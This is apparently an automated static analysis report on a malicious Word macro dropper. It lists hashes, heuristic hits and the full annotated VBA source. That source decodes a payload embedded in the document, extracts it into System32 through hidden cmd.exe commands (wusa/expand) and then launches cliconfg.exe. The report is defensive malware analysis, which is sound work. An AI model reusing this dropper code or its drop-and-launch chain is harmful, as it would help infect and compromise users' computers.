Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 86981680172bbf08…

MALICIOUS

Office (OLE)

78.5 KB Created: 2018-02-02 07:40:00 Authoring application: Microsoft Office Word First seen: 2019-01-20
MD5: 5ccfdca9b2a3628841accdedb33217fc SHA-1: 66d2cea01b46c3353f4339a986a97b24ed89ee18 SHA-256: 86981680172bbf0865e7693fe5a2bbe9b3ba12b3f1a1536ef67915daab78004c
408 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File

The sample is a Word document carrying VBA macros that run automatically from Document_Open. The macros download nothing: they read the open document's own file from disk, decode an embedded blob (31,235 encoded characters starting at byte offset 50,176) with a base64 variant that uses a shuffled custom alphabet, write the result to %TEMP%\setup.cab, and then use cmd.exe via Shell() (window hidden) to extract the cab into %SystemRoot%\System32, delete the cab, and launch cliconfg.exe. Execution is gated on the document being exactly 81,411 bytes, so a re-saved or otherwise modified copy will appear inert in dynamic analysis; note that the reported size above (78.5 KB) does not obviously match that gate, so verify the on-disk size of the analysed file before concluding the chain would fire. The Document_Open auto-exec and the ClamAV detection as 'Doc.Dropper.Agent' are consistent with a dropper for a second-stage payload; what the cab contains and why cliconfg.exe is launched afterwards (dropping a file beside a signed System32 binary and then starting it is consistent with DLL search-order hijacking) should be confirmed from the decoded payload rather than assumed.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6438391-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6438391-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            If System.Version >= "6.0" Then
                nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
            Else
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set oWscriptShell = CreateObject("WScript.Shell")
        sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set oWscriptShell = CreateObject("WScript.Shell")
        sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        proc_query = "SELECT * FROM Win32_Processor"
        Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
        For Each info In proc_results
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
            If System.Version >= "6.0" Then
                nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
            Else
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
        With ActiveDocument.Content
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3636 bytes
SHA-256: 06502a1e57707972f80d60c71cd4d8855da061884b895c72e766f5a5aca9f2e0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module-level state shared by Document_Open and the helpers below.
Dim nResult As Long        ' last Shell()/debase64 return value (also shadowed inside debase64)
Dim sFileName As String    ' full path of the open document (source of the embedded payload)
Dim sTempPath As String    ' expanded %TEMP%
Dim sTempFile As String    ' %TEMP%\setup.cab, the decoded payload on disk
Dim cbFileBuffer As Long   ' size in bytes of the open document, used as an execution gate
' Decodes nCount characters of InputFile, starting at byte offset nOffset,
' using a base64 variant with a custom shuffled alphabet, and writes the
' decoded bytes to OutputFile. Returns the number of bytes written.
'
' Parameters:
'   InputFile  - file to read; Document_Open passes the open .doc's own path,
'                so the payload is embedded in the document, not downloaded
'   nOffset    - 0-based byte offset of the encoded region
'   nCount     - number of encoded characters to read
'   OutputFile - destination path (created/overwritten, no error handling)
Private Function debase64(InputFile As String, nOffset As Long, nCount As Long, OutputFile As String) As Long
    Dim strKey As String
    Dim lpInBuffer
    Dim lpOutBuffer() As Byte
    ' VBA quirk: only the last name in a comma-separated Dim takes the type,
    ' so only enc4 is a Byte; chr1..enc3 are Variants.
    Dim chr1, chr2, chr3, enc1, enc2, enc3, enc4 As Byte
    ' Same quirk: nIndex is a Variant. nResult shadows the module-level nResult.
    Dim nIndex, nResult As Long
    
    ' 65-character substitution alphabet; (position - 1) is the 6-bit value.
    ' The 65th character ('v') yields 64 and is treated as padding below,
    ' i.e. it plays the role '=' has in standard base64 ('=' itself is an
    ' ordinary data character here).
    strKey = "KXU/yP=B29tLzidqNRuf-SbVInw0oCrmWZk6OpFc7A5GTD1QxaJ3H8h4jMeEsYglv"
    
    ' Binary read of the encoded region. Seek positions are 1-based, hence +1.
    Open InputFile For Binary As #1
        Seek #1, nOffset + 1
        lpInBuffer = Input(nCount, #1)
    Close #1
    
    ReDim lpOutBuffer(nCount) As Byte
    
    nIndex = 1
    nResult = 0
    
    Do While nIndex <= nCount
        ' Map four input characters to their 6-bit values. A character that is
        ' not in the alphabet makes InStr return 0, i.e. -1 here; nothing
        ' checks for that.
        enc1 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc2 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc3 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc4 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        ' Repack four 6-bit values into three bytes (standard base64 bit layout).
        chr1 = (enc1 * 4) Or (enc2 \ 16)
        chr2 = ((enc2 And 15) * 16) Or (enc3 \ 4)
        chr3 = ((enc3 And 3) * 64) Or enc4
        
        lpOutBuffer(nResult) = chr1
        nResult = nResult + 1
        
        ' Drop the second/third output byte when the trailing input
        ' characters are the padding value (64).
        If enc3 <> 64 Then
            lpOutBuffer(nResult) = chr2
            nResult = nResult + 1
        End If
        
        If enc4 <> 64 Then
            lpOutBuffer(nResult) = chr3
            nResult = nResult + 1
        End If
    Loop
    
    ' Trim to the bytes actually produced, then write them out in binary mode.
    ReDim Preserve lpOutBuffer(nResult - 1) As Byte
    
    Open OutputFile For Binary As #2
    Put #2, , lpOutBuffer
    Close #2
    
    debase64 = nResult
End Function

' Reports whether the host CPU is 64-bit by querying WMI
' (Win32_Processor.AddressWidth) through GetObject("Winmgmts:") — this is
' what the OLE_VBA_GETOBJ heuristic matched on.
' Returns False only when the last processor's width is 32; anything else,
' including an empty result set (which leaves IsWin32OrWin64 empty), yields True.
' Note: nothing in the extracted Document_Open calls this function; the OS
' branch there uses System.Version instead, so this may be leftover code or
' be used by a module that was not extracted.
Private Function IsWin64() As Boolean
    Dim proc_query As String
    Dim proc_results As Object
    Dim info As Object
    Dim IsWin32OrWin64 As String
    
    proc_query = "SELECT * FROM Win32_Processor"
    Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
    ' If several processors are returned, only the last one's width survives.
    For Each info In proc_results
        IsWin32OrWin64 = "Win" & info.AddressWidth
    Next info
    
    If IsWin32OrWin64 = "Win32" Then
        IsWin64 = False
    Else
        IsWin64 = True
    End If
End Function
' Auto-execution entry point: runs when the document is opened and macros are
' enabled. Decodes the payload embedded in this very document to
' %TEMP%\setup.cab, extracts it into System32 via cmd.exe, and launches
' cliconfg.exe.
Private Sub Document_Open()
    ' Force the whole document's text to black — presumably to reveal lure
    ' text hidden by colour (e.g. white on white); confirm against the
    ' document body. The commented-out line suggests a red paragraph was
    ' used during development.
    With ActiveDocument.Content
        .Font.ColorIndex = wdBlack
        '.Paragraphs(4).Range.Font.ColorIndex = wdRed
    End With

    ' oWscriptShell is never declared (no Option Explicit); it is only used to
    ' resolve %TEMP%. This is the WScript.Shell / CreateObject heuristic hit.
    Set oWscriptShell = CreateObject("WScript.Shell")
    sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
        
    ' The payload is carved out of this document's own on-disk file.
    sFileName = ActiveDocument.FullName
    cbFileBuffer = FileLen(sFileName)
    
    ' Execution gate: only a document of exactly 81411 bytes proceeds. This
    ' pins the hard-coded offset/length below to one specific build of the
    ' file; a re-saved, edited or differently sized copy does nothing on
    ' open — relevant when the sample looks inert in a sandbox.
    If (cbFileBuffer = 81411) Then
        sTempFile = sTempPath & "\setup.cab"
        
        ' Result is overwritten by the very next assignment, so this
        ' x86-path check is effectively dead (possibly a remnant of an
        ' x86/x64 branch).
        nResult = InStr(Application.Path, "x86")

    ' Decode 31235 encoded characters starting at byte offset 50176 of the
    ' document into %TEMP%\setup.cab.
    nResult = debase64(sFileName, 50176, 31235, sTempFile)
                
        ' OS-version branch. System.Version is a string in Word, so this is a
        ' string comparison: "10.0" sorts below "6.0" and would take the
        ' Else (expand) branch — verify on the target OS.
        ' Both branches do the same thing with a hidden window (0 = vbHide):
        ' extract the cab into %SystemRoot%\System32, delete the cab, then
        ' start cliconfg.exe. Writing into System32 requires the Word process
        ' to have write access there (i.e. elevated); otherwise the chain
        ' fails at the first command. Dropping a file next to a signed
        ' System32 binary and then launching it is consistent with DLL
        ' search-order hijacking of cliconfg.exe — confirm from the cab's
        ' contents rather than assuming it.
        If System.Version >= "6.0" Then
            nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        Else
            nResult = Shell("cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        End If
    End If
End Sub